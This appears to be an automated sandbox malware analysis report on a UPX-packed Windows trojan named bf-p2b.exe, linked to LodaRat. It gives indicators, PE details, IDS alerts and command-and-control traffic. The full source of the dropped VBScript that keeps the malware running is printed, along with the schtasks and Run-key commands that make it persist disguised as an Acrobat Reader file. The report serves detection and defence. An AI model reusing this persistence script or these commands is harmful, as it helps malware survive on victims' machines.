                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample file name: bf-p2b.exe
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winEXE@15/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 88
                  • Number of non-executed functions: 281
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes were analyzed; report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: bf-p2b.exe
                  Time: 16:06:55; Type: Autostart; Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JWPING "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                  Time: 16:06:57; Type: Task Scheduler; Description: Run new task: JWPING.exe path: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                  Time: 16:07:04; Type: Autostart; Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JWPING "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                  Time: 16:07:12; Type: Autostart; Description: Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnk
                         Match: 172.111.138.100; Associated Sample Name: gry.exe; Detection: malicious; Threat Name: Unknown
                         Match: 172.111.138.100; Associated Sample Name: dlawt.exe; Detection: malicious; Threat Name: LodaRat
                         Match: 172.111.138.100; Associated Sample Name: nXi3rwhMmB.exe; Detection: malicious; Threat Name: LodaRat
                         No context
                         Match: VOXILITYGB; Associated Sample Name: 3DD0A5685E10EF6D63758CAFEE7C651F8AE80A4766415.exe; Detection: malicious; Threat Name: DCRat; Context: 5.254.105.122
                         Match: VOXILITYGB; Associated Sample Name: gry.exe; Detection: malicious; Threat Name: Unknown; Context: 172.111.138.100
                         Match: VOXILITYGB; Associated Sample Name: file.exe; Detection: malicious; Threat Name: Vidar, Xmrig; Context: 172.94.15.211
                         Match: VOXILITYGB; Associated Sample Name: file.exe; Detection: malicious; Threat Name: Vidar, Xmrig; Context: 172.94.15.211
                         Match: VOXILITYGB; Associated Sample Name: a3it5k4FkD.exe; Detection: malicious; Threat Name: XWorm; Context: 172.94.9.95
                         Match: VOXILITYGB; Associated Sample Name: eMAEe8LX4T.exe; Detection: malicious; Threat Name: XWorm; Context: 172.94.9.95
                         Match: VOXILITYGB; Associated Sample Name: TRADING_ADVISORY.exe; Detection: malicious; Threat Name: Remcos, GuLoader; Context: 104.250.181.155
                         Match: VOXILITYGB; Associated Sample Name: R8dbGhYG6e.exe; Detection: malicious; Threat Name: Unknown; Context: 172.94.9.95
                         Match: VOXILITYGB; Associated Sample Name: R8dbGhYG6e.exe; Detection: malicious; Threat Name: Unknown; Context: 172.94.9.95
                         Match: VOXILITYGB; Associated Sample Name: Payment_Copy.docx.vbs; Detection: malicious; Threat Name: AgentTesla, WSHRAT; Context: 104.243.242.103
                         Match: VOXILITYGB; Associated Sample Name: Payment_Copy.pdf.js; Detection: malicious; Threat Name: WSHRAT; Context: 104.243.242.12
                         Match: VOXILITYGB; Associated Sample Name: bQ1X.exe; Detection: malicious; Threat Name: Remcos; Context: 172.111.139.116
                         Match: VOXILITYGB; Associated Sample Name: bQta.exe; Detection: malicious; Threat Name: Remcos; Context: 172.111.139.193
                         Match: VOXILITYGB; Associated Sample Name: SOA00291.pdf.exe; Detection: malicious; Threat Name: Nanocore; Context: 104.250.181.155
                         Match: VOXILITYGB; Associated Sample Name: FAKTURA_I.exe; Detection: malicious; Threat Name: Remcos, DBatLoader; Context: 172.94.12.73
                         Match: VOXILITYGB; Associated Sample Name: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe; Detection: malicious; Threat Name: XWorm; Context: 172.111.138.90
                         Match: VOXILITYGB; Associated Sample Name: zg9ZjvXyS0.exe; Detection: malicious; Threat Name: Xmrig; Context: 172.94.15.211
                         Match: VOXILITYGB; Associated Sample Name: zqdZqQhxI1QOUR2.exe; Detection: malicious; Threat Name: XWorm; Context: 45.74.7.170
                         Match: VOXILITYGB; Associated Sample Name: dlawt.exe; Detection: malicious; Threat Name: LodaRat; Context: 172.111.138.100
                         Match: VOXILITYGB; Associated URL: https://gem.godaddy.com/signups/activate/MS0tRkJxS0E5V0lDNkx5b2JKZ3gyTUt3bVNoYkZXU053V2lQSVl6NzZlaTB4cHdoRHlxaFJuRGsrMWhXS2hIY1ZTUXhWVENKN3hvR3pZbjlpTT0tLVVzMmdScDBaclRxY3Q5UG8tLXFBRDNrV1hwbmhOK1VZMEFrSGc2ZVE9PQ==?signup=6884095; Detection: malicious; Threat Name: Unknown; Context: 45.74.8.8
                         No context
                         No context
                         Process: C:\Users\user\Desktop\bf-p2b.exe
                         File Type: ASCII text, with CRLF line terminators
                         Category: modified
                         Size (bytes): 821
                         Entropy (8bit): 5.342775569223086
                         Encrypted: false
                         SSDEEP: 24:dF/UZkEU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/Uot+G+7xLxe0WABNVIqZaVzgA
                         MD5: 974653F76FF545E2A170ED3327C3B009
                         SHA1: D0A3C95F769032AC1F080D7B1900B2E7F2DFC316
                         SHA-256: 036034A734FE39B95AD3C536AC75675F955AF07FD6FE5B2BBDDBD76E48DE2D9F
                         SHA-512: 8B17DA4AF636006ED081F296BA845CF34B02E3E4BBE55D6CA27841B1E26C2D3B0821EDE6E8998B7FF3717F22E8825A7D21E41FF70F3C90591EF8147213205AF9
                         Malicious: true
                         Yara Hits:
                         • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\JWPING.vbs, Author: Joe Security
                         Antivirus:
                         • Antivirus: Avira, Detection: 100%
                         Reputation: low
                        Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "bf-p2b.exe"..fileset = """C:\Users\user\Desktop\bf-p2b.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                         Process: C:\Users\user\Desktop\bf-p2b.exe
                         File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Thu Nov 30 15:06:55 2023, mtime=Thu Nov 30 15:06:55 2023, atime=Thu Nov 30 15:06:55 2023, length=1049600, window=hide
                         Category: dropped
                         Size (bytes): 1902
                         Entropy (8bit): 3.4727309956615144
                         Encrypted: false
                         SSDEEP: 24:8EEG8+CDxeELgyED9vA9TT1ePED9arE2+s9T4IlDyrGBm:8EEPDxV0KJT884br9MIlF
                         MD5: A49AC8CFA5CC9E7C2E38112E41314AEE
                         SHA1: 6CD1B102ACC4D370FFD8048D0278C24679A61456
                         SHA-256: 82120353F9D49D6CC9088BA94AAD683DEA301165E7ED0198588E181476E41466
                         SHA-512: 30F0C9FED682CB4D8D6EF131B930B1561D3A9E95063766C9CDA37416581C6D8E495E0CC82A3992D91036F16A5CD204599D2B9187457F0588266030349A19859C
                         Malicious: false
                         Reputation: low
                        Preview:L..................F.@.. .....)=.#....+=.#....+=.#............................:..DG..Yr?.D..U..k0.&...&......vk.v....^/......P.H=.#......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^~W............................%..A.p.p.D.a.t.a...B.V.1.....DW.D..Roaming.@......CW.^~W...........................r.6.R.o.a.m.i.n.g.....V.1.....~W...Windata.@......~W.~W.............................q.W.i.n.d.a.t.a.......2.....~W. .SOFTWA~1.EXE..l......~W.~W.............................`.S.o.f.t.w.a.r.e.f.x.-.A.c.r.o.b.a.t.-.R.e.a.d.e.r...e.x.e.......s...............-.......r...........5]]......C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe..4.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.S.o.f.t.w.a.r.e.f.x.-.A.c.r.o.b.a.t.-.R.e.a.d.e.r...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..............
                         Process: C:\Users\user\Desktop\bf-p2b.exe
                         File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                         Category: dropped
                         Size (bytes): 1049600
                         Entropy (8bit): 7.716346330255184
                         Encrypted: false
                         SSDEEP: 24576:nhloDX0XOf4WaJIlk9tI9DF9Z3HgVFVi:nhloJfPlAt6p/3A7V
                         MD5: 1446D857FE2760CFF287A534295226F4
                         SHA1: 79C0484ED853D1AB8AB3942854666C0C59363721
                         SHA-256: DC93CB125EB5D10C02312B369EE50060E0A3ED28001864BBA114DC28111E3CFD
                         SHA-512: F7D50C9691A1F4119C292BD74067D6AAC42CAC7290896C969253D7F6FC7A9C3BB00AE1696399BADFA0DBFCA5BD278B2315701910CFAE296AA8F6E6EDEE2FC5C9
                         Malicious: true
                         Antivirus:
                         • Antivirus: Joe Sandbox ML, Detection: 100%
                         • Antivirus: ReversingLabs, Detection: 49%
                         Reputation: low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....ce.........."......P...........0.......@....@...........................#...........@...@.......@.....................|.".$....@..|....................."......................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                         File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                         Entropy (8bit): 7.716346330255184
                         TrID:
                         • Win32 Executable (generic) a (10002005/4) 99.39%
                         • UPX compressed Win32 Executable (30571/9) 0.30%
                         • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                         • Generic Win/DOS Executable (2004/3) 0.02%
                         • DOS Executable Generic (2002/1) 0.02%
                         File name: bf-p2b.exe
                         File size: 1'049'600 bytes
                         MD5: 1446d857fe2760cff287a534295226f4
                         SHA1: 79c0484ed853d1ab8ab3942854666c0c59363721
                         SHA256: dc93cb125eb5d10c02312b369ee50060e0a3ed28001864bba114dc28111e3cfd
                         SHA512: f7d50c9691a1f4119c292bd74067d6aac42cac7290896c969253d7f6fc7a9c3bb00ae1696399badfa0dbfca5bd278b2315701910cfae296aa8f6e6edee2fc5c9
                         SSDEEP: 24576:nhloDX0XOf4WaJIlk9tI9DF9Z3HgVFVi:nhloJfPlAt6p/3A7V
                         TLSH: CD25019AAD419D07C7F361B2FB9085B330191E357A61587895B93F3B32F8C879B86720
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                         Icon Hash: 71b29131e39de423
                         Entrypoint: 0x5830e0
                         Entrypoint Section: UPX1
                         Digitally signed: false
                         Imagebase: 0x400000
                         Subsystem: windows gui
                         Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                         DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                         Time Stamp: 0x6563848E [Sun Nov 26 17:46:54 2023 UTC]
                         TLS Callbacks:
                         CLR (.Net) Version:
                         OS Version Major: 5
                         OS Version Minor: 1
                         File Version Major: 5
                         File Version Minor: 1
                         Subsystem Version Major: 5
                         Subsystem Version Minor: 1
                         Import Hash: ef471c0edf1877cd5a881a6a8bf647b9
                        Instruction
                        pushad
                        mov esi, 0052F000h
                        lea edi, dword ptr [esi-0012E000h]
                        push edi
                        jmp 00007F52B0B4734Dh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B4732Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007F52B0B4734Dh
                        jne 00007F52B0B4736Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B47361h
                        dec eax
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007F52B0B47316h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007F52B0B47394h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007F52B0B47353h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F52B0B473B7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007F52B0B4734Dh
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B4730Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B47300h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007F52B0B47331h
                        jne 00007F52B0B4734Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007F52B0B47326h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007F52B0B47350h
                        mov al, byte ptr [edx]
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x22f67c | 0x424 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x184000 | 0xab67c | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x22faa0 | 0xc | .rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1832c4 | 0x48 | UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        UPX0 | 0x1000 | 0x12e000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX1 | 0x12f000 | 0x55000 | 0x54400 | False | 0.9884956880563798 | data | 7.936284427117873 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x184000 | 0xac000 | 0xabc00 | False | 0.7830098025836972 | data | 7.538368475780757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x1844d4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                        RT_ICON | 0x184600 | 0x400e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9961580680570802
                        RT_ICON | 0x188614 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.13257127646989234
                        RT_ICON | 0x198e40 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.19468677738070211
                        RT_ICON | 0x1a22ec | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | Great Britain | 0.20830827067669172
                        RT_ICON | 0x1a8ad8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.22144177449168206
                        RT_ICON | 0x1adf64 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.21941426547000473
                        RT_ICON | 0x1b2190 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.29937759336099584
                        RT_ICON | 0x1b473c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.3419324577861163
                        RT_ICON | 0x1b57e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5310283687943262
                        RT_STRING | 0xf5c28 | 0x594 | empty | English | Great Britain | 0
                        RT_STRING | 0xf61bc | 0x68a | empty | English | Great Britain | 0
                        RT_STRING | 0xf6848 | 0x490 | empty | English | Great Britain | 0
                        RT_STRING | 0xf6cd8 | 0x5fc | empty | English | Great Britain | 0
                        RT_STRING | 0xf72d4 | 0x65c | empty | English | Great Britain | 0
                        RT_STRING | 0xf7930 | 0x466 | empty | English | Great Britain | 0
                        RT_STRING | 0xf7d98 | 0x158 | empty | English | Great Britain | 0
                        RT_RCDATA | 0x1b5c54 | 0x794f2 | data | | | 1.0003240205924142
                        RT_GROUP_ICON | 0x22f14c | 0x84 | data | English | Great Britain | 0.7272727272727273
                        RT_GROUP_ICON | 0x22f1d4 | 0x14 | data | English | Great Britain | 1.15
                        RT_VERSION | 0x22f1ec | 0xdc | data | English | Great Britain | 0.6181818181818182
                        RT_MANIFEST | 0x22f2cc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                        DLL | Import
                        KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dll | AddAce
                        COMCTL32.dll | ImageList_Remove
                        COMDLG32.dll | GetSaveFileNameW
                        GDI32.dll | LineTo
                        IPHLPAPI.DLL | IcmpSendEcho
                        MPR.dll | WNetUseConnectionW
                        ole32.dll | CoGetObject
                        OLEAUT32.dll | VariantInit
                        PSAPI.DLL | GetProcessMemoryInfo
                        SHELL32.dll | DragFinish
                        USER32.dll | GetDC
                        USERENV.dll | LoadUserProfileW
                        UxTheme.dll | IsThemeActive
                        VERSION.dll | VerQueryValueW
                        WININET.dll | FtpOpenFileW
                        WINMM.dll | timeGetTime
                        WSOCK32.dll | socket
                        Language of compilation system | Country where language is spoken | Map
                        English | Great Britain |
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        11/30/23-17:07:37.309723 | TCP | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        11/30/23-17:07:37.309723 | TCP | 2822116 | ETPRO TROJAN Loda Logger CnC Beacon | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        11/30/23-17:08:57.785609 | TCP | 2830912 | ETPRO TROJAN Loda Logger CnC Beacon Response M2 | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 30, 2023 17:07:05.657947063 CET | 49729 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:06.073431015 CET | 5552 | 49729 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:06.573442936 CET | 49729 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:07.130831957 CET | 5552 | 49729 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:07.635806084 CET | 49729 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:08.093849897 CET | 5552 | 49729 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:08.604543924 CET | 49729 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:09.121746063 CET | 5552 | 49729 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:09.635817051 CET | 49729 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:10.307450056 CET | 5552 | 49729 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:19.340179920 CET | 49735 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:20.059978008 CET | 5552 | 49735 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:20.573316097 CET | 49735 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:20.958200932 CET | 5552 | 49735 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:21.463917017 CET | 49735 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:22.005271912 CET | 5552 | 49735 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:22.510843992 CET | 49735 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:22.916419983 CET | 5552 | 49735 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:23.417045116 CET | 49735 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:23.868441105 CET | 5552 | 49735 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:32.871150970 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:33.250902891 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:33.760818958 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:34.169720888 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:34.682655096 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:35.077801943 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:35.588896036 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:37.308173895 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:07:37.309231043 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:37.309722900 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100
                        Nov 30, 2023 17:07:40.255747080 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:08:57.785609007 CET | 5552 | 49736 | 172.111.138.100 | 192.168.2.4
                        Nov 30, 2023 17:08:57.838962078 CET | 49736 | 5552 | 192.168.2.4 | 172.111.138.100

                        Target ID:0
                        Start time:17:06:54
                        Start date:30/11/2023
                        Path:C:\Users\user\Desktop\bf-p2b.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\bf-p2b.exe
                        Imagebase:0xb00000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:1
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
                        Imagebase:0x320000
                        File size:147'456 bytes
                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Target ID:4
                        Start time:17:06:56
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                        Imagebase:0x80000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:17:06:57
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 49%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:17:07:01
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:7
                        Start time:17:07:04
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
